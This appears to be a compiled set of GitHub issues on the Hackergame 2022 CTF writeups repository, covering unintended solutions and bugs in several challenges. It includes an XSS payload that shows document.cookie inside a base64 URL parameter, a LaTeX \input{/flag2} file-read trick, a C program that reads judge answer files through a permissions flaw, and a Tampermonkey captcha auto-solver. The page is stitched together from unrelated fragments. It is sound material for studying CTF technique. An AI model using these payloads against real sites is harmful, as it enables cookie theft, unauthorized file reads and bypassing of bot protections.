ustc-hackergame / hackergame2022-writeups
Official and unofficial writeups for Hackergame 2022
License: Other
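When packaging the docker image, the challenge author added the data/ directory to the image with COPY and set the directory owner to judger, with directory permissions 766.
online_judge.py was expected to use os.makedir() to set the permissions of the data directory to 700, but os.makedir() does not change the permissions of a directory that already exists; see os.makedirs in the Python 3.11 documentation. So the runner user can read the contents of data.
And static.out is readable by other users. Hence the unintended solution below.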
#include <stdio.h>
#include <stdlib.h>

// static_data_path
char *sdata_input_path = "./data/static.in";
char *sdata_output_path = "./data/static.out";
const int LEN = 2048;

int main() {
    // getline() allocates the buffers itself when given NULL and size 0
    char *lines[2] = {NULL, NULL};
    size_t ns[2] = {0, 0};
    FILE *fp = fopen(sdata_output_path, "r");
    if (fp == NULL) {
        printf("failed to read static output");
        exit(1);
    }
    // read and show the 2 prime numbers.
    if (getline(&lines[0], &ns[0], fp) != -1)
        printf("%s", lines[0]);
    if (getline(&lines[1], &ns[1], fp) != -1)
        printf("%s", lines[1]);
    free(lines[0]);
    free(lines[1]);
    fclose(fp);
    return 0;
}
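The permission behaviour this issue describes, as an added example that is not part of the original issue or the challenge's code: `os.makedirs(..., mode=0o700, exist_ok=True)` leaves an existing directory's mode untouched, so the mode has to be set and verified explicitly. The directory is constructed in a temporary location and the helper names are hypothetical.

```python
import os
import stat
import tempfile


def mode_of(path):
    """Return the permission bits of path as an int (e.g. 0o766)."""
    return stat.S_IMODE(os.stat(path).st_mode)


def naive_prepare(path):
    """Relies on makedirs to apply 0o700: no effect when path already exists."""
    os.makedirs(path, mode=0o700, exist_ok=True)
    return mode_of(path)


def hardened_prepare(path, want=0o700):
    """Create the directory if needed, then enforce and verify its mode."""
    os.makedirs(path, mode=want, exist_ok=True)
    os.chmod(path, want)  # explicit: makedirs leaves existing directories alone
    got = mode_of(path)
    if got != want:
        raise PermissionError(f"{path}: mode {oct(got)}, expected {oct(want)}")
    return got


def demo():
    """Constructed scenario: data/ already present with mode 766, as in the image."""
    with tempfile.TemporaryDirectory() as root:
        data = os.path.join(root, "data")
        os.mkdir(data)
        os.chmod(data, 0o766)           # the mode the issue reports for data/
        before = naive_prepare(data)    # mode is still 0o766
        after = hardened_prepare(data)  # mode is now 0o700
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("after makedirs only:", oct(before))
    print("after makedirs + chmod:", oct(after))
```
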
Just use alert(document.cookie) and selenium prints the flag out.
Please submit your quiz URL:
> http://202.38.93.111:10056/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg==
Your URL converted to http://web/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg==
I am using Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.119 Safari/537.36
- Logining...
Putting secret flag...
- Now browsing your quiz result...
ERROR <class 'selenium.common.exceptions.UnexpectedAlertPresentException'>
selenium.common.exceptions.UnexpectedAlertPresentException: Alert Text: flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}
Message: unexpected alert open: {Alert text : flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}}
(Session info: headless chrome=106.0.5249.119)
Stacktrace:
#0 0x55be02e75d53 <unknown>
#1 0x55be02c62786 <unknown>
#2 0x55be02cd6636 <unknown>
0xffffffffffffffffffffffffffffffff is a solution, because the crc128 of this thing is itself, and it is also a des weak key... I just tried it on a whim and it worked.
The EXIF version written on macOS is 2.3.1, with one extra dot...
So which one is actually correct?
Hi all, can anybody help me?
My question is how to use the method secp256k1_sqr_mont(BN_ULONG res[P256_LIMBS], const BN_ULONG a[P256_LIMBS]) from https://github.com/piggypiggy/secp256k1-x64
the POC code for https://github.com/USTC-Hackergame/hackergame2022-writeups/tree/master/official/%E5%B0%8F%20Z%20%E7%9A%84%E9%9D%93%E5%8F%B7%E9%92%B1%E5%8C%85
This POC only works for this public key:
0x04a362925f16b3f45e7048b376dfd54beedee8defc8ea0804823c489f3cf5862f13e89da68fa280f0812ef2d339d95352bd97c03ccf0a6304a1aa004b6557ddd4b
I tried using another (profanity) public key and it is not working, any idea?
I have a CTF challenge to solve using this POC, please.
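rclone has a command verb called rclone reveal.
The developers also did not expect that anyone would need to dig through the Go source code to decrypt this.
The documentation also says it is meant to guard against Eyedropping.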
In the Python file code.py the qc.measure_all() call creates a new classical register and does not use the one already provided during initialization via QuantumCircuit(129,128).
I demonstrate the issue at a smaller scale, because I cannot simulate such a large circuit, but the issue is even more important when the registers allocated are bigger. Run the following code in the Python file:
from qiskit import QuantumCircuit, Aer
circuit = QuantumCircuit(5, 5)
circuit.x(0)
circuit.x(4)
circuit.measure_all() # <-- this will create a new classical register
sim = Aer.get_backend('qasm_simulator')
counts = sim.run(circuit).result().get_counts()
print(counts) # <-- you can see the output here
The output will be {'10001 00000': 1024}. There are double the number of bits in the output, because the classical register is not used.
I would have expected to use the classical register already provided during initialization.
What about using the add_bits=False flag in the measure_all method to reuse the existing classical register? Here is the suggested version:
qc.measure_all(add_bits=False)
Thanks in advance, I wish you a happy and productive day.
Try this:
$$
\begingroup
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{/flag2}
\endgroup
$$
Really not worth making a PR for this...
This is mentioned in a group chat
On the page http://202.38.93.111:18000/ , opening the console and calling functions from the script will automatically give the correct flag:
And it will trigger the page to reload and give these results:
The reason behind this is how JS handles undefined; in function change(value) we have:
function change(value) {
range[1] = Math.round(parseFloat(value) * 1000000)
document.getElementById('submit').disabled = !(range[1] >= 0 && range[1] <= 1000000)
}
Here, calling parseFloat(undefined) will return NaN instead of triggering an error:
And by accident (kind of?), JavaScript and Java share the identical naming for NaN, and the POST payload triggered is shown as:
Thus giving the correct flag.
It should be src/getflag.hei.py
I felt awkward about opening a separate PR just for this problem, so I filed an issue instead.
Create a Tampermonkey script and enable it.
// default settings...
// ...
// @match http://202.38.93.111:10047/xcaptcha
// ...
(function() {
    'use strict';
    // Your code here...
    let btn = document.getElementById("submit")
    // calculate the first one
    let nums = document.querySelector("body > div > form > div:nth-child(1) > label").innerHTML.split(" ")[0].split("+")
    let sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
    document.querySelector("#captcha1").value=sum
    // second
    nums = document.querySelector("body > div > form > div:nth-child(2) > label").innerHTML.split(" ")[0].split("+")
    sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
    document.querySelector("#captcha2").value=sum
    // third
    nums = document.querySelector("body > div > form > div:nth-child(3) > label").innerHTML.split(" ")[0].split("+")
    sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
    document.querySelector("#captcha3").value=sum
    btn.click()
})();